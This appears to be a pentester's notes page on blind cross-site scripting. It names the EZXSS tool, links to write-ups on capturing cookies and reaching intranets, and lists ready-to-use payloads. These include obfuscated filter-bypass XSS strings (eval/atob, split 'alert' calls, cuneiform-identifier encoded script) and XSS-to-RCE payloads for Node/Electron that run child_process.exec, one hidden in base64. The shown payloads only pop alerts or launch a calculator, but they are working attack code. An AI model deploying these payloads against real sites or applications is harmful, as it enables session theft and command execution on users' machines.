EZXSS: a blind-XSS vulnerability testing tool
Some vulnerable spots and clever tricks
- Stored blind XSS in new-user registration to capture cookies
https://baijiahao.baidu.com/s?id=1700829679816535168&wfr=spider&for=pc
- Stored blind XSS via file upload to capture cookies
https://cloud.tencent.com/developer/article/1856838
- Blind XSS in a complaint form
https://www.secpulse.com/archives/147537.html?ivk_sa=1024320u
- Log XSS to reach the intranet; a bug from combining nginx and Apache
https://www.csdn.net/tags/NtjaMg4sNzQyOTgtYmxvZwO0O0OO0O0O.html
XSS: understanding and bypassing filters from a code perspective
https://www.cnblogs.com/Dark1nt/p/14852560.html
Some payloads
https://github.com/TyrantSec/Fuzzing/blob/master/XSS-Polyglots/99-XSS-Polyglots.txt
<style onload=eval(atob("YWxlcnQoMSkK"));></style>
<script>top[`al`+`ert`](1)</script>
<img src="x" onerror="top['al'+'ert'](1)">
<svg onload='top["al"+"ert"](1)'>
<script>𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()</script>
XSS→RCE
https://mp.weixin.qq.com/s/fh0JCWsv95NwBlmKN6rCNQ
<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>
https://mp.weixin.qq.com/s/ZjYtFS8v4l6inEXnLoWTuw
https://mp.weixin.qq.com/s/wiT_Jh311FMdzqNb9AozWw
<script>
require('child_process').exec('calc');
// or
top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>